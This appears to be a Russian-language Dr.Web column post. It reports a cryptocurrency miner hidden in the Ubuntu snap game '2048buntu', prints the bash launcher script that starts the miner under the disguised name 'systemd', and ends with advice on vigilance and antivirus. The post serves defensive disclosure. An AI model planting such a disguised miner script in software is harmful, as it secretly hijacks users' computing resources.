Вы используете устаревший браузер!

Страница может отображаться некорректно.

Незваные гости

Незваные гости

Другие выпуски этой рубрики (57)
  • добавить в избранное
    Добавить в закладки

«Моя первая Ferrari»

Прочитали: 1180 Комментариев: 78 Рейтинг: 89

Энкодеры для Linux – не новость; чего уж там, мы же первый и нашли. Майнеры для «линуксов» тоже известны – обычные, не вредоносные. Но было бы странно, если бы на волне популярности злоумышленники не попытались немного подзаработать за счет простых пользователей этой операционной системы.

В популярном дистрибутиве Ubuntu с недавних пор появился новый формат приложений – snap-пакет. Соответственно, появился и официальный магазин, наподобие Windows Store и прочих. И все это – чтобы пользователю было проще работать с системой. Вот только проверять приложения, добавляемые в магазин, никто не собирался.

Бдительный пользователь обнаружил в коде игрушки майнер криптовалют и скрипт, прописывающий автоматический запуск этого майнера.

Открытый код – хорошая штука, можно сразу увидеть все вредоносные планы приложения. А выглядят они примерно так:


#!/bin/bash

currency=bcn
name=2048buntu


{ # try
/snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1 -g
} || { # catch
cores=($(grep -c ^processor /proc/cpuinfo))

if (( $cores < 4 )); then
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 1
else
    /snap/$name/current/systemd -u myfirstferrari@protonmail.com --$currency 2
fi
}

https://github.com/canonical-websites/snapcraft.io/issues/651

Вот только почему-то никто этого не замечал. Мало того, подобные майнеры и скрипты оказались и в других приложениях того же автора. Вредоносный код добывал криптовалюту для пользователя с адресом, который по-русски звучит как «моя первая Ferrari». Счётчика скачиваний или установок в Ubuntu Snap Store нет, поэтому узнать, успел ли вирусописатель накопить на машину мечты, доподлинно неизвестно.

#Linux #игры #майнинг

Dr.Web рекомендует

  1. Используя Linux, не теряйте бдительности. Даже то, что исходники ПО с открытым кодом может проверить каждый, совершенно не означает, что этот «каждый» что-то проверяет. Зачастую, как показывает практика, каждый надеется на кого-то другого, в то время как вредоносный код или опасная уязвимость распространяется на множество рабочих станций и серверов.
  2. Либо проверяйте код каждой программы, которую собираетесь скачать и установить, либо используйте антивирус. Не ждите милости с неба!

Получайте Dr.Web-ки за участие в проекте

Каждая активность = 1 Dr.Web-ка

Оцените выпуск

Сделайте репост

Поставьте «Нравится»

Чтобы получать награды надо войти на страницу выпуска через аккаунт на сайте «Доктор Веб» (или создать аккаунт). Аккаунт должен быть связан с вашим аккаунтом в социальной сети. Видео о связывании аккаунта.


Нам важно ваше мнение

10 Dr.Web-ок за комментарий в день выхода выпуска или 1 Dr.Web-ка в любой другой день. Комментарии публикуются автоматически и постмодерируются. Правила комментирования новостей «Доктор Веб».

Чтобы оставить комментарий, нужно зайти через свой аккаунт на сайте «Доктор Веб». Если аккаунта еще нет, его можно создать.

Комментарии пользователей


 
На страницу: